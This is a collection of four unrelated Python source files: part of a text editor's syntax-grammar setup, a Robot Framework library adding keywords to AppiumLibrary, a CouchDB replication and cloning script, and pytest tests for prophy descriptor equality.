        raise Exception('missing grammar for "' + grammarName + '" in prefs.py')

    def __set_up_grammars(self, defaultGrammars):
        """Index grammars by name and compile their combined marker regexes.

        For each grammar a single alternation regex ("matchRe") is built
        from: escaped marker, end marker, contained/next grammar openers,
        errors, keywords, types, specials, and three trailing whitespace/
        wide-char/newline markers.  "indexLimits" records where each
        category ends inside that alternation.
        """
        self.grammars = {}
        # Arrange all the grammars by name.
        for k, v in defaultGrammars.items():
            v["name"] = k
            self.grammars[k] = v
        # Compile regexes for each grammar.
        for k, v in defaultGrammars.items():
            if 0:
                # Disabled: separate per-category regexes.
                # keywords re.
                v["keywordsRe"] = re.compile(
                    app.regex.join_re_word_list(
                        v.get("keywords", []) + v.get("types", [])
                    )
                )
                v["errorsRe"] = re.compile(app.regex.join_re_list(v.get("errors", [])))
                v["specialsRe"] = re.compile(
                    app.regex.join_re_list(v.get("special", []))
                )
            # contains and end re.
            matchGrammars = []
            markers = []
            # Index [0]
            if v.get("escaped"):
                markers.append(v["escaped"])
                matchGrammars.append(v)
            else:
                # Add a non-matchable placeholder.
                markers.append(app.regex.kNonMatchingRegex)
                matchGrammars.append(None)
            # Index [1]
            if v.get("end"):
                markers.append(v["end"])
                matchGrammars.append(v)
            else:
                # Add a non-matchable placeholder.
                markers.append(app.regex.kNonMatchingRegex)
                matchGrammars.append(None)
            # |Contains| markers start at index 2.
            for grammarName in v.get("contains", []):
                g = self.grammars.get(grammarName, None)
                if g is None:
                    self._raise_grammar_not_found(grammarName)
                markers.append(g.get("begin", g.get("matches", u"")))
                matchGrammars.append(g)
            # |Next| markers start after |contains|.
            for grammarName in v.get("next", []):
                g = self.grammars.get(grammarName, None)
                if g is None:
                    self._raise_grammar_not_found(grammarName)
                markers.append(g["begin"])
                matchGrammars.append(g)
            # |Errors| markers start after |next| markers.
            markers += v.get("errors", [])
            # |Keywords| markers start after |errors| markers.
            for keyword in v.get("keywords", []):
                markers.append(r"\b" + keyword + r"\b")
            # |Types| markers start after |keywords| markers.
            for types in v.get("types", []):
                markers.append(r"\b" + types + r"\b")
            # |Special| markers start after |types| markers.
            markers += v.get("special", [])
            # Variable width characters are at index [-3] in markers.
            markers.append(r"\t+")
            # Potentially double wide characters are at index [-2] in markers.
            markers.append(u"[\U00001100-\U000fffff]+")
            # Carriage return characters are at index [-1] in markers.
            markers.append(r"\n")
            # app.log.startup('markers', v['name'], markers)
            v["matchRe"] = re.compile(app.regex.join_re_list(markers))
            v["markers"] = markers
            v["matchGrammars"] = matchGrammars
            containsGrammarIndexLimit = 2 + len(v.get("contains", []))
            nextGrammarIndexLimit = containsGrammarIndexLimit + len(v.get("next", []))
            errorIndexLimit = nextGrammarIndexLimit + len(v.get("errors", []))
            keywordIndexLimit = errorIndexLimit + len(v.get("keywords", []))
            typeIndexLimit = keywordIndexLimit + len(v.get("types", []))
            specialIndexLimit = typeIndexLimit + len(v.get("special", []))
            v["indexLimits"] = (
                containsGrammarIndexLimit,
                nextGrammarIndexLimit,
                errorIndexLimit,
                keywordIndexLimit,
                typeIndexLimit,
                specialIndexLimit,
            )
        # Reset the re.cache for user regexes.
        re.purge()

    def __set_up_file_types(self, defaultFileTypes):
        """Build the name->grammar and extension->grammar lookup tables."""
        self.nameToType = {}
        self.extensions = {}
        fileTypes = {}
        for k, v in defaultFileTypes.items():
            for name in v.get("name", []):
                self.nameToType[name] = v.get("grammar")
            for ext in v["ext"]:
                self.extensions[ext] = v.get("grammar")
            fileTypes[k] = v
        if 0:
            # Disabled debug dump.  Fix: the original referenced the
            # undefined bare name `extensions` here.
            app.log.info("extensions")
            for k, v in self.extensions.items():
                app.log.info(" ", k, ":", v)
            app.log.info("fileTypes")
            for k, v in fileTypes.items():
                app.log.info(" ", k, ":", v)
|
|
# -*- coding: utf-8 -*-
"""AppiumEnhanceLibrary is the enhancement of robotframework-appiumlibrary.
It will bring back these missing keywords from robotframework selenium2library.
Detailed information can be found on github.com:
https://github.com/ScenK/robotframework-AppiumEnhanceLibrary
"""
import os
from robot.libraries.BuiltIn import BuiltIn
from selenium.webdriver.common.action_chains import ActionChains
class AppiumEnhanceLibrary(object):
    """AppiumEnhanceLibrary for supporting actions not included in RF.

    Support more keywords for AppiumLibrary.
    Detailed information about AppiumLibrary can be found on github.com:
    https://github.com/jollychang/robotframework-appiumlibrary
    """

    def __init__(self):
        """Init function.

        Load and store configs in to variables.
        """
        super(AppiumEnhanceLibrary, self).__init__()
        # Reuse the AppiumLibrary instance Robot Framework already created
        # so both libraries share the same application session.
        self.apu = BuiltIn().get_library_instance('AppiumLibrary')

    def execute_javascript(self, *code):
        """Execute the given JavaScript code.

        `code` may contain multiple lines of code and may be divided into
        multiple cells in the test data. In that case, the parts are
        concatenated together without adding spaces.

        The JavaScript executes in the context of the currently selected
        frame or window as the body of an anonymous function. Use _window_ to
        refer to the window of your application and _document_ to refer to the
        document object of the current frame or window, e.g.
        _document.getElementById('foo')_.

        This keyword returns None unless there is a return statement in the
        JavaScript. Return values are converted to the appropriate type in
        Python, including WebElements.

        Examples:
        | Execute JavaScript | window.my_js('arg1', 'arg2') | |
        | ${sum}= | Execute JavaScript | return 1 + 1; |
        | Should Be Equal | ${sum} | ${2} |
        """
        js = self._get_javascript_to_execute(''.join(code))
        return self.apu._current_application().execute_script(js)

    def wait_until_element_is_visible(self, locator, timeout=None, error=None):
        """Wait until element specified with `locator` is visible.

        Fails if `timeout` expires before the element is visible. See
        `introduction` for more information about `timeout` and its
        default value.

        `error` can be used to override the default error message.

        See also `Wait Until Page Contains`, `Wait Until Page Contains
        Element`, `Wait For Condition`.
        """
        def check_visibility():
            # _is_visible returns True/False, or None when nothing matched.
            visible = self._is_visible(locator)
            if visible:
                return
            elif visible is None:
                return error or "Element locator '%s' did not match any " \
                                "elements after %s" % \
                                (locator, self.apu._format_timeout(timeout))
            else:
                return error or "Element '%s' was not visible in %s" % \
                                (locator, self.apu._format_timeout(timeout))
        self.apu._wait_until_no_error(timeout, check_visibility)

    def wait_until_element_is_not_visible(self, locator, timeout=None,
                                          error=None):
        """Wait until element specified with `locator` is not visible.

        Fails if `timeout` expires before the element is not visible. See
        `introduction` for more information about `timeout` and its
        default value.

        `error` can be used to override the default error message.

        See also `Wait Until Page Contains`, `Wait Until Page Contains
        Element`, `Wait For Condition`.
        """
        def check_hidden():
            visible = self._is_visible(locator)
            if not visible:
                return
            elif visible is None:
                return error or "Element locator '%s' did not match any " \
                                "elements after %s" % \
                                (locator, self.apu._format_timeout(timeout))
            else:
                return error or "Element '%s' was still visible in %s" % \
                                (locator, self.apu._format_timeout(timeout))
        self.apu._wait_until_no_error(timeout, check_hidden)

    def element_should_be_visible(self, locator, message=''):
        """Verify that the element identified by `locator` is visible.

        Herein, visible means that the element is logically visible,
        not optically visible in the current browser viewport. For example,
        an element that carries display:none is not logically visible,
        so using this keyword on that element would fail.

        `message` can be used to override the default error message.

        Key attributes for arbitrary elements are `id` and `name`. See
        `introduction` for details about locating elements.
        """
        visible = self._is_visible(locator)
        if not visible:
            if not message:
                message = "The element '%s' should be visible, but it " \
                          "is not." % locator
            raise AssertionError(message)

    def element_should_not_be_visible(self, locator, message=''):
        """Verify that the element identified by `locator` is NOT visible.

        This is the opposite of `Element Should Be Visible`.

        `message` can be used to override the default error message.

        Key attributes for arbitrary elements are `id` and `name`. See
        `introduction` for details about locating elements.
        """
        visible = self._is_visible(locator)
        if visible:
            if not message:
                message = "The element '%s' should not be visible, " \
                          "but it is." % locator
            raise AssertionError(message)

    def element_should_contain(self, locator, expected, message=''):
        """Verifies element identified by `locator` contains text `expected`.

        If you wish to assert an exact (not a substring) match on the text
        of the element, use `Element Text Should Be`.

        `message` can be used to override the default error message.

        Key attributes for arbitrary elements are `id` and `name`. See
        `introduction` for details about locating elements.
        """
        actual = self._get_text(locator)
        if expected not in actual:
            if not message:
                message = "Element '%s' should have contained text '%s' but " \
                          "its text was '%s'." % (locator, expected, actual)
            raise AssertionError(message)

    def wait_until_element_contains(self, locator, text, timeout=None,
                                    error=None):
        """Wait until given element contains `text`.

        Fails if `timeout` expires before the text appears on given element.
        See `introduction` for more information about `timeout` and its
        default value.

        `error` can be used to override the default error message.

        See also `Wait Until Page Contains`, `Wait Until Page Contains Element`
        , `Wait For Condition`, `Wait Until Element Is Visible`.
        """
        element = self.apu._element_find(locator, True, True)

        def check_text():
            actual = element.text
            if text in actual:
                return
            else:
                return error or "Text '%s' did not appear in %s to element " \
                                "'%s'. Its text was '%s'." \
                                % (text, self.apu._format_timeout(timeout),
                                   locator, actual)
        self.apu._wait_until_no_error(timeout, check_text)

    def wait_until_element_does_not_contain(self, locator, text,
                                            timeout=None, error=None):
        """Wait until given element does not contain `text`.

        Fails if `timeout` expires before the text disappears from given
        element. See `introduction` for more information about `timeout` and
        its default value.

        `error` can be used to override the default error message.

        See also `Wait Until Page Contains`, `Wait Until Page Contains Element`
        , `Wait For Condition`, `Wait Until Element Is Visible`.
        """
        element = self.apu._element_find(locator, True, True)

        def check_text():
            actual = element.text
            if text not in actual:
                return
            else:
                return error or "Text '%s' did not disappear in %s from " \
                                "element '%s'." % (text,
                                                   self.apu._format_timeout(
                                                       timeout), locator)
        self.apu._wait_until_no_error(timeout, check_text)

    def page_should_contain(self, text):
        """Verify that current page contains `text`.

        If this keyword fails, it automatically logs the page source
        using the log level specified with the optional `loglevel` argument.
        Giving `NONE` as level disables logging.
        """
        # Fix: page_should_contain_text is a bound method on the
        # AppiumLibrary instance; the original passed `self` as a stray
        # extra positional argument.
        self.apu.page_should_contain_text(text)

    def page_should_not_contain(self, text):
        """Verify that current page not contains `text`.

        If this keyword fails, it automatically logs the page source
        using the log level specified with the optional `loglevel` argument.
        Giving `NONE` as level disables logging.
        """
        # Fix: same stray `self` argument as in page_should_contain.
        self.apu.page_should_not_contain_text(text)

    def wait_for_condition(self, condition, timeout=None, error=None):
        """Wait until the given `condition` is true or `timeout` expires.

        The `condition` can be arbitrary JavaScript expression but must contain
        a return statement (with the value to be returned) at the end.
        See `Execute JavaScript` for information about accessing the
        actual contents of the window through JavaScript.

        `error` can be used to override the default error message.

        See `introduction` for more information about `timeout` and its
        default value.

        See also `Wait Until Page Contains`, `Wait Until Page Contains
        Element`, `Wait Until Element Is Visible` and BuiltIn keyword
        `Wait Until Keyword Succeeds`.
        """
        if not error:
            error = "Condition '%s' did not become true in <TIMEOUT>" % \
                    condition
        # Deliberate `== True`: the script must return exactly true, not
        # merely a truthy value.
        self.apu._wait_until(timeout, error,
                             lambda: self.apu._current_application().
                             execute_script(condition) == True)

    def get_horizontal_position(self, locator):
        """Return horizontal position of element identified by `locator`.

        The position is returned in pixels off the left side of the page,
        as an integer. Fails if a matching element is not found.

        See also `Get Vertical Position`.
        """
        x = self.apu.get_element_location(locator)['x']
        return x

    def get_vertical_position(self, locator):
        """Return vertical position of element identified by `locator`.

        The position is returned in pixels off the top of the page,
        as an integer. Fails if a matching element is not found.

        See also `Get Horizontal Position`.
        """
        y = self.apu.get_element_location(locator)['y']
        return y

    def get_value(self, locator):
        """Return the value attribute of element identified by `locator`.

        See `introduction` for details about locating elements.
        """
        return self.apu.get_element_attribute(locator, 'value')

    def get_text(self, locator):
        """Return the text value of element identified by `locator`.

        See `introduction` for details about locating elements.
        """
        return self._get_text(locator)

    def mouse_down_at(self, locator, xoffset, yoffset):
        """Support `mouse down at` for AppiumLibrary.

        Offsets are relative to the top-left corner of the element.

        Args:
        - locator: robot framework locator.
        - xoffset: X offset to start.
        - yoffset: Y offset to start.

        Examples:
        | Mouse Down At | id=canvas | 120 | 250 |
        """
        element = self.apu._element_find(locator, True, True)
        if element is None:
            raise AssertionError("ERROR: Element %s not found." % locator)
        ActionChains(self.apu._current_application()).\
            move_to_element_with_offset(element, xoffset, yoffset).\
            click_and_hold().perform()

    def mouse_up_at(self, locator, xoffset, yoffset):
        """Support `mouse up at` for Selenium2Library.

        Right now use click off-line button to end mouse behaviour.
        Offsets are relative to the top-left corner of the element.

        Args:
        - locator: robot framework locator.
        - xoffset: X offset to end.
        - yoffset: Y offset to end.

        Examples:
        | Mouse Up At | id=canvas | 320 | 830 |
        """
        element = self.apu._element_find(locator, True, True)
        if element is None:
            raise AssertionError("ERROR: Element %s not found." % locator)
        # The release() function here could not rightly performed. Use click
        # off-line button instead.
        ActionChains(self.apu._current_application()).\
            move_to_element_with_offset(element, 1, 1).\
            move_by_offset(xoffset, yoffset).click().perform()

    def drag_and_drop_by_offset(self, locator, xoffset, yoffset):
        """Drag element identified with locator.

        Element will be moved by xoffset and yoffset, each of which is a
        negative or positive number specifying the offset.

        Examples:
        | Drag And Drop By Offset | myElem | 50 | -35 |
        # Move myElem 50px right and 35px down. |
        """
        element = self.apu._element_find(locator, True, True)
        if element is None:
            raise AssertionError("ERROR: Element %s not found." % locator)
        # Fix: ActionChains needs the resolved WebElement; the original
        # passed the locator string, which selenium cannot act on.
        ActionChains(self.apu._current_application()).\
            drag_and_drop_by_offset(element, xoffset, yoffset).perform()

    def get_matching_xpath_count(self, xpath):
        """Returns number of elements matching `xpath`.

        One should not use the xpath= prefix for 'xpath'. XPath is assumed.

        Correct:
        | count = | Get Matching Xpath Count | //div[@id='sales-pop']
        Incorrect:
        | count = | Get Matching Xpath Count | xpath=//div[@id='sales-pop']

        If you wish to assert the number of matching elements, use
        `Xpath Should Match X Times`.
        """
        count = len(self.apu._element_find("xpath=" + xpath, False, False))
        return str(count)

    def select_frame(self, locator):
        """Sets frame identified by `locator` as current frame.

        Key attributes for frames are `id` and `name.` See `introduction` for
        details about locating elements.
        """
        element = self.apu._element_find(locator, True, True)
        self.apu._current_application().switch_to_frame(element)

    def unselect_frame(self):
        """Sets the top frame as the current frame."""
        self.apu._current_application().switch_to_default_content()

    def get_element_attribute(self, attribute_locator):
        """Return value of element attribute.

        `attribute_locator` consists of element locator followed by an @ sign
        and attribute name, for example "element_id@class".
        """
        locator, attribute_name = self._parse_attribute_locator(
            attribute_locator)
        element = self.apu._element_find(locator, True, False)
        if element is None:
            raise ValueError("Element '%s' not found." % locator)
        return element.get_attribute(attribute_name)

    def get_element_size(self, locator):
        """Get element size as a (width, height) tuple.

        Examples:
        | ${size}= | Get Element Size | css=.items |
        """
        element_size = self.apu.get_element_size(locator)
        size = (element_size['width'], element_size['height'])
        return size

    # Private

    def _is_visible(self, locator):
        # Returns True/False for a matched element, None when no match.
        element = self.apu._element_find(locator, True, False)
        if element is not None:
            return element.is_displayed()
        return None

    def _get_text(self, locator):
        element = self.apu._element_find(locator, True, True)
        if element is not None:
            return element.text
        return None

    @staticmethod
    def _parse_attribute_locator(attribute_locator):
        # Split "locator@attribute" on the LAST '@' so locators containing
        # '@' still work.
        parts = attribute_locator.rpartition('@')
        if len(parts[0]) == 0:
            raise ValueError(
                "Attribute locator '%s' does not contain an element locator."
                % attribute_locator)
        if len(parts[2]) == 0:
            raise ValueError(
                "Attribute locator '%s' does not contain an attribute name."
                % attribute_locator)
        return parts[0], parts[2]

    @staticmethod
    def _get_javascript_to_execute(code):
        # Treat `code` as a file path only when it is an absolute path to
        # an existing file; otherwise it is inline JavaScript.
        codepath = code.replace('/', os.sep)
        if not (os.path.isabs(codepath) and os.path.isfile(codepath)):
            return code
        # `with` guarantees the file is closed (the original used an
        # explicit try/finally).
        with open(codepath) as codefile:
            return codefile.read().strip()
|
|
#!/usr/bin/env python
import couchdb
import json
import argparse
import logbook
import sys
import os
import ConfigParser
from couchdb import PreconditionFailed
# Set up logging: module-level logger shared by all replication helpers.
l = logbook.Logger('CouchDB-Replicator')
class Config(object):
    """Singleton class that holds the configuration for the CouchDB replicator.

    Reads the source/destination server URLs (and the optional exceptions
    and roles sections) from an INI-style file, ~/.couchrc by default.
    """
    # Shared singleton instance returned by every construction.
    # NOTE(review): __init__ still runs on each Config() call, re-reading
    # the file onto the shared instance -- confirm that is intended.
    _instance = None

    def __new__(self, *args, **kwargs):
        # 'self' here is actually the class (conventionally named cls).
        if not self._instance:
            self._instance = super(Config, self).__new__(self, *args, **kwargs)
        return self._instance

    def __init__(self, config_file=None):
        config = ConfigParser.SafeConfigParser()
        try:
            if not config_file:
                # Default to ~/.couchrc when no explicit path is given.
                config_file = os.path.join(os.environ['HOME'], '.couchrc')
            with open(config_file, 'r') as f:
                config.readfp(f)
            # SOURCE and DESTINATION are mandatory.
            self.source = config.get('replication', 'SOURCE').rstrip()
            self.destination = config.get('replication', 'DESTINATION').rstrip()
        except:
            # Deliberate catch-all: any failure to load the mandatory
            # settings aborts with a hint instead of a traceback.
            l.error("Please make sure you've created your own configuration file \
(i.e: ~/.couchrc), and that it contains a source and a destination servers")
            sys.exit(-1)
        # Optional [exceptions] section: databases to exclude from replication.
        self.exceptions = [] if not config.has_section('exceptions') else \
            [exception for _, exception in config.items('exceptions')]
        # Optional [roles] section: comma-separated members/admins lists
        # applied to the replicated databases' _security objects.
        self.roles = {"members": [],
                      "admins": []
                      }
        if config.has_section('roles'):
            if config.has_option('roles', 'members'):
                self.roles['members'] = config.get('roles', 'members').split(',')
            if config.has_option('roles', 'admins'):
                self.roles['admins'] = config.get('roles', 'admins').split(',')
def _get_databases_info(source, destination, skip=None):
    """Returns a tuple containing a python representation of source and destination
    couchDB instances. It also returns a list of the databases in both instances
    (excluding the _replicator database and any database listed in *skip*).

    *skip* is optional; callers that do not need to exclude anything may omit
    it. The caller's list is never modified.
    """
    s_couch = couchdb.Server(source)
    d_couch = couchdb.Server(destination)
    _, _, s_dbs = s_couch.resource.get_json('_all_dbs')
    _, _, d_dbs = d_couch.resource.get_json('_all_dbs')
    l.info("Databases in the source CouchDB instance: {}".format(', '.join(s_dbs)))
    l.info("Databases in the destination CouchDB instance: {}".format(', '.join(d_dbs)))
    # Work on a copy: the original appended to the caller's list, which is a
    # surprising side effect (and breaks callers using a shared default list).
    # We never replicate the internal _replicator database.
    to_skip = list(skip) if skip else []
    to_skip.append('_replicator')
    for db in to_skip:
        # EAFP: the database may be present in one instance only.
        try:
            s_dbs.remove(db)
        except ValueError:
            pass
        try:
            d_dbs.remove(db)
        except ValueError:
            pass
    return s_couch, d_couch, s_dbs, d_dbs
def _setup_continuous(source, destination, copy_security):
    """Set up a continuous replication of all databases in source to destination.

    For every database in *source*: create the database in *destination* if
    needed, put a continuous replication document in the source's
    ``_replicator`` database and, when *copy_security* is true, copy the
    database's ``_security`` object to the destination.
    """
    # Bug fix: the original called _get_databases_info with only two
    # arguments while the function required three, raising TypeError.
    s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(source, destination, [])
    # Loop-invariant handle hoisted out of the per-database loop.
    s_rep = s_couch['_replicator']
    #For each DB in the source CouchDB instance, create a replication document
    #and get its _security object to put it in the destination database
    for db in s_dbs:
        _, _, security = s_couch[db].resource.get_json('_security')
        doc = {
            'name': '{}_rep'.format(db),
            'source': '{}/{}/'.format(source, db),
            'target': '{}/{}/'.format(destination, db),
            'continuous': True
        }
        #Create the DB in the destination if not present
        try:
            d_couch.create(db)
            l.info("Created {} database in destination".format(db))
        except PreconditionFailed:
            l.info("Database {} already existing in the destination, not creating it".format(db))
        #Put the replicator document in source and set security object in destination
        l.info("Putting replicator document in _replicator database of source")
        s_rep.create(doc)
        if copy_security:
            l.info("Copying security object to {} database in destination".format(db))
            d_couch[db].resource.put('_security', security)
    l.info("DONE!")
def _clone(source, destination, copy_security, with_exceptions=False, skip=None):
    """Creates a complete clone of source in destination.
    WARNING: This action will remove ALL content from destination.

    *skip* is an optional list of database names to leave untouched in the
    destination. When *with_exceptions* is true, the documents listed in the
    config's ``[exceptions]`` section are deleted from each cloned database.
    """
    l.info("Performing a complete clone from source to destination")
    # Normalize to a fresh list: fixes the shared mutable-default pitfall
    # (skip=[] was mutated downstream) and tolerates callers passing None
    # (argparse yields None when --skip is absent).
    skip = list(skip) if skip else []
    s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(source, destination, skip)
    config = Config()
    #Delete all databases in destination
    l.info("Removing all databases from destination")
    for db in d_dbs:
        # The users database is never deleted (the re-create loop below
        # relies on it surviving; the original deleted it here by mistake).
        if db != '_users':
            d_couch.delete(db)
    #Create all databases abailable in source to destination. Copy data and
    #permissions
    l.info("Re-creating databases from source into destination")
    for db in s_dbs:
        #The users database is never deleted, so it is not re-created either
        if not db == '_users':
            d_couch.create(db)
        _, _, security = s_couch[db].resource.get_json('_security')
        source_db = '/'.join([source, db])
        dest_db = '/'.join([destination, db])
        l.info("Copying data from {} in source to destination".format(db))
        d_couch.replicate(source_db, dest_db)
        if copy_security:
            l.info("Copying security object to {} database in destination".format(db))
            d_couch[db].resource.put('_security', security)
        if with_exceptions:
            exceptions = config.exceptions
            if not exceptions:
                l.warn("--with-exceptions option was present, but didn't find " \
                       "any EXCEPTIONS list in your .couchrc file.")
            else:
                l.info("--with-exceptions option was present, removing following documents: {}".format(", ".join(exceptions)))
                for exception in exceptions:
                    # Best-effort delete: a missing document is only warned
                    # about. Exception (not bare except) keeps SystemExit /
                    # KeyboardInterrupt propagating.
                    try:
                        d_couch[db].delete(d_couch[db].get(exception))
                    except Exception:
                        l.warn("Document {} not found, not deleteing".format(exception))
    l.info("DONE!")
def _set_roles(server):
    """Apply the list of roles present in .couchrc to all databases in the server.

    *server* is the URL of the CouchDB instance whose databases receive the
    ``_security`` object built from the config's ``[roles]`` section.
    """
    security_obj = {"admins": {
                        "names": [],
                        "roles": []
                        },
                    "members": {
                        "names": [],
                        "roles": []
                        }
                    }
    config = Config()
    security_obj['admins']['roles'] = config.roles['admins']
    security_obj['members']['roles'] = config.roles['members']
    # Bug fixes: the original ignored the `server` parameter and read the
    # module-level globals `source`/`destination` (NameError when imported),
    # and called _get_databases_info with a missing third argument.
    # Only the destination handle and database list are needed here.
    s_couch, d_couch, s_dbs, d_dbs = _get_databases_info(server, server, [])
    l.info("Setting roles to destination databases: {}".format(str(security_obj)))
    for db in d_dbs:
        d_couch[db].resource.put('_security', security_obj)
if __name__ == "__main__":
    DESCRIPTION = """Set up complete one-way replication for CouchDB.
    Use this script if you want to configure a stage database that will have the
    exact same content of your production database.
    To do so, the script creates a replication document for each database in the
    source CouchDB instance that replicates such database (in continuous mode)
    to the destination database.
    Security object (permissions per database), are put to the destination databases.
    """
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument('action', type=str, help = "Action to perform, either \
            configure continuous replication (continuous) or punctual clone (clone)")
    parser.add_argument('--source', type=str, help = "Source CouchDB instance, \
            with the credentials included in the URL. I.E: http://admin:passw@source_db:5984")
    parser.add_argument('--destination', type=str, help = "Destination CouchDB instance, \
            with the credentials included in the URL. I.E: http://admin:passw@destination_db:5984")
    parser.add_argument('--no-security', action='store_const', const=True, \
            help='Do not copy security objects')
    parser.add_argument('--with-exceptions', action='store_const', const=True, \
            help='List of files to be deleted from the DataBases after being copied. ' \
                 'To be specified in your .couchrc file')
    parser.add_argument('--set-roles', action='store_const', const=True, \
            help='List of roles to apply to each database after copied. Only if' \
                 '--no-security is present.')
    parser.add_argument('--skip', nargs="+", type=str,
            help=('List of databases to skip during the replication. '
                  'They will remain intact in the destination database'))
    args = parser.parse_args()
    source = args.source
    destination = args.destination
    copy_security = not args.no_security
    action = args.action
    config = Config()
    # Fall back to the config file when either endpoint is missing on the CLI.
    if not all([source, destination]):
        source = config.source
        destination = config.destination
    actions = ['continuous', 'clone']
    if action not in actions:
        raise ValueError("Action not recognised, please choose between %s" % \
                ', '.join(actions))
    # Credentials are embedded in the URLs; log only the host part.
    l.info("Starting replication - source: {}, destination: {}".format( \
            source.split('@')[-1], destination.split('@')[-1]))
    if action == "continuous":
        _setup_continuous(source, destination, copy_security)
    else:
        # Bug fix: args.skip is None when --skip is absent, which crashed
        # inside _get_databases_info; pass an empty list instead.
        _clone(source, destination, copy_security,
               with_exceptions=args.with_exceptions,
               skip=args.skip if args.skip else [])
    if args.set_roles:
        if not args.no_security:
            l.warn('--set-roles option only takes effect if applied together ' \
                   'with --no-security. Ignoring it')
        else:
            _set_roles(destination)
|
|
import prophy
import pytest
def get_integer_class1(_type):
    """Struct type with a single scalar 'value' field of the given type."""
    fields = [("value", _type)]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_optional_class1(_type):
    """Struct type with a single optional 'value' field of the given type."""
    fields = [("value", prophy.optional(_type))]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_array_class1(_type):
    """Struct type with an unbounded (greedy) array 'value' field."""
    fields = [("value", prophy.array(_type))]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_array_class2(_type):
    """Struct type with a fixed-size (4) array 'value' field."""
    fields = [("value", prophy.array(_type, size=4))]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_array_class3(_type):
    """Packed struct type with a fixed-size (4) array 'value' field."""
    fields = [("value", prophy.array(_type, size=4))]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
def get_array_bound_class1(_type):
    """Struct type with a u32-bound array 'value' field sized by 'len'."""
    fields = [
        ("len", prophy.u32),
        ("value", prophy.array(_type, bound="len")),
    ]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_array_bound_class2(_type):
    """Struct type with an i32-bound array 'value' field sized by 'len'."""
    fields = [
        ("len", prophy.i32),
        ("value", prophy.array(_type, bound="len")),
    ]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
        _descriptor = fields
    return X
def get_enum_class1():
    """Enum with members x=1 and y=2."""
    members = [("x", 1), ("y", 2)]
    class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
        _enumerators = members
    return X
def get_enum_class2():
    """Enum with members x=1 and y=3 (same names as class1, one value differs)."""
    members = [("x", 1), ("y", 3)]
    class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
        _enumerators = members
    return X
def get_enum_class3():
    """Enum with members x=1 and z=3 (same values as class2, one name differs)."""
    members = [("x", 1), ("z", 3)]
    class X(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
        _enumerators = members
    return X
def get_fixed_bytes():
    """Packed struct with a fixed-size (5) bytes 'value' field."""
    fields = [("value", prophy.bytes(size=5))]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
def get_bound_bytes():
    """Packed struct with a bytes 'value' field bound by 'value_len'."""
    fields = [
        ("value_len", prophy.u32),
        ("value", prophy.bytes(bound="value_len")),
    ]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
def get_shift_bound_bytes():
    """Packed struct with a shifted (by 2) length-bound bytes 'value' field."""
    fields = [
        ("value_len", prophy.u8),
        ("value", prophy.bytes(bound="value_len", shift=2)),
    ]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
def get_limited_bytes():
    """Packed struct with a bytes field both size-limited (5) and length-bound."""
    fields = [
        ("value_len", prophy.u32),
        ("value", prophy.bytes(size=5, bound="value_len")),
    ]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
def get_greedy_bytes():
    """Packed struct with an unbounded (greedy) bytes 'value' field."""
    fields = [("value", prophy.bytes())]
    class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
        _descriptor = fields
    return X
@pytest.mark.parametrize('_type', [
    prophy.i8, prophy.i16, prophy.i32, prophy.i64,
    prophy.u8, prophy.u16, prophy.u32, prophy.u64,
    prophy.r32,
])
def test_compare_descriptors_scalars(_type):
    """Two independently generated scalar structs compare equal."""
    first = get_integer_class1(_type)
    second = get_integer_class1(_type)
    assert first == second
@pytest.mark.parametrize('_type', [
    prophy.i8, prophy.i16, prophy.i32, prophy.i64,
    prophy.u8, prophy.u16, prophy.u32, prophy.u64,
    prophy.r32,
])
def test_compare_descriptors_arrays(_type):
    """Identical array definitions compare equal; every distinct kind differs."""
    factories = [
        get_array_bound_class1,
        get_array_bound_class2,
        get_array_class1,
        get_array_class2,
        get_array_class3,
    ]
    # One (left, right) pair per array flavour, each built twice.
    pairs = [(make(_type), make(_type)) for make in factories]
    for left, right in pairs:
        assert left == right
    # All distinct flavours must compare unequal, pairwise.
    for i in range(len(pairs)):
        for j in range(i + 1, len(pairs)):
            assert pairs[i][0] != pairs[j][0]
@pytest.mark.parametrize('_type', [
    prophy.i8, prophy.i16, prophy.i32, prophy.i64,
    prophy.u8, prophy.u16, prophy.u32, prophy.u64,
    prophy.r32,
])
def test_compare_descriptors_optional(_type):
    """Two independently generated optional-field structs compare equal."""
    first = get_optional_class1(_type)
    second = get_optional_class1(_type)
    assert first == second
def test_compare_enum():
    """Equal enum definitions match; differing values or names do not."""
    base_a, base_b = get_enum_class1(), get_enum_class1()
    other_value = get_enum_class2()   # same names, one value differs
    other_name = get_enum_class3()    # same values, one name differs
    assert base_a == base_b
    assert base_a != other_value
    assert base_a != other_name
    assert other_value != other_name
def test_compare_bytes():
    """Equal bytes-field definitions match; distinct flavours differ."""
    fixed_a, fixed_b = get_fixed_bytes(), get_fixed_bytes()
    bound_a, bound_b = get_bound_bytes(), get_bound_bytes()
    greedy_a, greedy_b = get_greedy_bytes(), get_greedy_bytes()
    limited_a, limited_b = get_limited_bytes(), get_limited_bytes()
    assert fixed_a == fixed_b
    assert bound_a == bound_b
    assert greedy_a == greedy_b
    assert limited_a == limited_b
    # NOTE(review): bound vs limited was never asserted in the original
    # either -- coverage kept unchanged on purpose.
    assert fixed_a != bound_a
    assert fixed_a != greedy_a
